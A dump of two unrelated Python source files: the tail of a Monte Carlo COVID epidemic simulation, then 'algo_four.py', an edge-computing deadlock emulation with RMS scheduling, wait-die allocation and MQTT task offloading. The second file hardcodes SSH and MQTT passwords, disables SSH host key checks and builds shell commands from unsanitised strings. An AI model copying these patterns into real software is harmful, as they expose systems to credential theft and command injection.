df_data["current_vent_usage"] = xp.sum(vent, axis=0)
if "daily_deaths" in columns:
# prepend the min cumulative cases over the last 2 days in case in the decreased
prepend_deaths = xp.minimum(self.g_data.cum_death_hist[-2], self.g_data.cum_death_hist[-1])
daily_deaths = xp.diff(out.D, prepend=prepend_deaths[:, None], axis=-1)
df_data["daily_deaths"] = daily_deaths
if self.reject_runs:
init_inc_death_mean = xp.mean(xp.sum(daily_deaths[:, 1:4], axis=0))
hist_inc_death_mean = xp.mean(xp.sum(self.g_data.inc_death_hist[-7:], axis=-1))
inc_death_rejection_fac = 2.0 # TODO These should come from the cli arg -r
if (init_inc_death_mean > inc_death_rejection_fac * hist_inc_death_mean) or (
inc_death_rejection_fac * init_inc_death_mean < hist_inc_death_mean
):
logging.info("Inconsistent inc deaths, rejecting run")
raise SimulationException
if "daily_cases" in columns or "daily_reported_cases" in columns:
# prepend the min cumulative cases over the last 2 days in case in the decreased
prepend_cases = xp.minimum(self.g_data.cum_case_hist[-2], self.g_data.cum_case_hist[-1])
daily_reported_cases = xp.diff(out.incC, axis=-1, prepend=prepend_cases[:, None])
if self.reject_runs:
init_inc_case_mean = xp.mean(xp.sum(daily_reported_cases[:, 1:4], axis=0))
hist_inc_case_mean = xp.mean(xp.sum(self.g_data.inc_case_hist[-7:], axis=-1))
inc_case_rejection_fac = 1.5 # TODO These should come from the cli arg -r
if (init_inc_case_mean > inc_case_rejection_fac * hist_inc_case_mean) or (
inc_case_rejection_fac * init_inc_case_mean < hist_inc_case_mean
):
logging.info("Inconsistent inc cases, rejecting run")
raise SimulationException
if "daily_reported_cases" in columns:
df_data["daily_reported_cases"] = daily_reported_cases
if "daily_cases" in columns:
daily_cases_total = daily_reported_cases / self.params.CASE_REPORT[:, None]
df_data["daily_cases"] = daily_cases_total
if "cumulative_reported_cases" in columns:
cum_cases_reported = out.incC
df_data["cumulative_reported_cases"] = cum_cases_reported
if "cumulative_cases" in columns:
cum_cases_total = out.incC / self.params.CASE_REPORT[:, None]
df_data["cumulative_cases"] = cum_cases_total
if "daily_hospitalizations" in columns:
out.incH[:, 0] = out.incH[:, 1]
daily_hosp = xp.diff(out.incH, axis=-1, prepend=out.incH[:, 0][..., None])
df_data["daily_hospitalizations"] = daily_hosp
if "total_population" in columns:
N = xp.broadcast_to(self.Nj[..., None], out.state.shape[1:])
df_data["total_population"] = N
if "current_hospitalizations" in columns:
hosps = xp.sum(out.Rh, axis=0) # why not just using .H?
df_data["current_hospitalizations"] = hosps
if "cumulative_deaths" in columns:
cum_deaths = out.D
df_data["cumulative_deaths"] = cum_deaths
if "active_asymptomatic_cases" in columns:
asym_I = xp.sum(out.Ia, axis=0)
df_data["active_asymptomatic_cases"] = asym_I
if "case_reporting_rate" in columns:
crr = xp.broadcast_to(self.params.CASE_REPORT[:, None], adm2_ids.shape)
df_data["case_reporting_rate"] = crr
if "R_eff" in columns:
r_eff = self.npi_params["r0_reduct"].T * np.broadcast_to(
(self.params.R0 * self.g_data.Aij.diag)[:, None], adm2_ids.shape
)
df_data["R_eff"] = r_eff
if "doubling_t" in columns:
Td = np.broadcast_to(self.doubling_t[:, None], adm2_ids.shape)
df_data["doubling_t"] = Td
# Collapse the gamma-distributed compartments and move everything to cpu
negative_values = False
for k in df_data:
# if df_data[k].ndim == 2:
# df_data[k] = xp.sum(df_data[k], axis=0)
if k != "date" and xp.any(xp.around(df_data[k], 2) < 0.0):
logging.info("Negative values present in " + k)
negative_values = True
if negative_values and self.reject_runs:
logging.info("Rejecting run b/c of negative values in output")
raise SimulationException
return df_data
if output:
os.makedirs(output_folder, exist_ok=True)
output_queue.put((os.path.join(output_folder, str(seed)), df_data))
# TODO we should output the per monte carlo param rolls, this got lost when we switched from hdf5
def main(args=None):
"""Main method for a complete simulation called with a set of CLI args"""
if args is None:
args = sys.argv[1:]
args = parser.parse_args(args=args)
if args.gpu:
logging.info("Using GPU backend")
use_cupy(optimize=args.opt)
reimport_numerical_libs("model.main.main")
warnings.simplefilter(action="ignore", category=xp.ExperimentalWarning)
if not os.path.exists(args.output_dir):
os.mkdir(args.output_dir)
loglevel = 30 - 10 * min(args.verbosity, 2)
runid = get_runid()
# Setup output folder TODO change over to pathlib
output_folder = os.path.join(args.output_dir, runid)
if not os.path.exists(output_folder):
os.mkdir(output_folder)
fh = logging.FileHandler(output_folder + "/stdout")
fh.setLevel(logging.DEBUG)
logging.basicConfig(
level=loglevel,
format="%(asctime)s - %(levelname)s - %(filename)s:%(funcName)s:%(lineno)d - %(message)s",
handlers=[TqdmLoggingHandler()],
)
debug_mode = loglevel < 20
# TODO we should output the logs to output_dir too...
_banner()
# TODO move the write_thread stuff to a util (postprocess uses something similar)
to_write = queue.Queue(maxsize=100)
def writer():
"""Write thread loop that pulls from an async queue"""
# Call to_write.get() until it returns None
stream = xp.cuda.Stream(non_blocking=True) if args.gpu else None
for base_fname, df_data in iter(to_write.get, None):
cpu_data = {k: xp.to_cpu(v, stream=stream) for k, v in df_data.items()}
if stream is not None:
stream.synchronize()
df = pd.DataFrame(cpu_data)
for date, date_df in df.groupby("date", as_index=False):
fname = base_fname + "_" + str(date.date()) + ".feather"
date_df.reset_index().to_feather(fname)
write_thread = threading.Thread(target=writer, daemon=True)
write_thread.start()
logging.info(f"command line args: {args}")
env = buckyModelCovid(
debug=debug_mode,
sparse_aij=(not args.dense),
t_max=args.days,
graph_file=args.graph_file,
par_file=args.par_file,
npi_file=args.npi_file,
disable_npi=args.disable_npi,
reject_runs=args.reject_runs,
)
seed_seq = np.random.SeedSequence(args.seed)
total_start = datetime.datetime.now()
success = 0
n_runs = 0
pbar = tqdm.tqdm(total=args.n_mc, desc="Performing Monte Carlos", dynamic_ncols=True)
try:
while success < args.n_mc:
mc_seed = seed_seq.spawn(1)[0].generate_state(1)[0] # inc spawn key then grab next seed
pbar.set_postfix_str(
"seed="
+ str(mc_seed)
+ ", rej%=" # TODO disable rej% if not -r
+ str(np.around(float(n_runs - success) / (n_runs + 0.00001) * 100, 1)),
refresh=True,
)
try:
n_runs += 1
with xp.optimize_kernels():
sol = env.run_once(seed=mc_seed)
base_filename = os.path.join(output_folder, str(mc_seed))
env.to_feather(sol, base_filename, mc_seed, output_queue=to_write)
success += 1
pbar.update(1)
except SimulationException:
pass
except (KeyboardInterrupt, SystemExit):
logging.warning("Caught SIGINT, cleaning up")
to_write.put(None)
write_thread.join()
finally:
to_write.put(None)
write_thread.join()
pbar.close()
logging.info(f"Total runtime: {datetime.datetime.now() - total_start}")
if __name__ == "__main__":
main()
|
algo_four.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
received_time = []
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence with wait_die
def wait_die(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 'w' or 0 in work:
if 0 in work:
ind = work.index(0)
i = processes[ind]
elif 'w' in work:
# print('wk: ', work)
ind = work.index('w')
i = processes[ind]
else:
break
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
# print('added: ', exec_seq)
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', n_need[_max])
if processes.index(_max) > processes.index(i): # if true, i is older
# if process is already waiting then offload process
if work[ind] == 'w':
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload reentry: ', i, offload)
else:
# wait put process to waiting
work[processes.index(i)] = 'w'
# print('waiting: ', i)
else:
# abort i
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload: ', i)
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(p)]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wait_die(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wait-die {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_10_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_10_{mec_no} = {mec_rtt} \ncpu{_id_}_10_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_10_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_10_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_10_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_10_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_10_{mec_no} = {deadlock} \nmemory{_id_}_10_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_10_{mec_no} = {cooperate} \ntask_record{_id_}_10_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_10_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_10_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_10_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_10_{mec_no} = {mec_rtt} \ncpu{_id_}_10_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_10_{mec_no} = {_off_mec} \noff_cloud{_id_}_10_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_10_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_10_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_10_{mec_no} = {deadlock} \nmemory{_id_}_10_{mec_no} = {memory}",
f"\ntask_received{_id_}_10_{mec_no} = {total_received_task} \nsent_t{_id_}_10_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_10_{mec_no} = {cooperate} \ntask_record{_id_}_10_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_10_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_10_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datap.py"
os.system(cmd)
else:
os.system('mkdir -p data/raw')
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_10_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_10_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_10_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_10_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.5)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
print('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
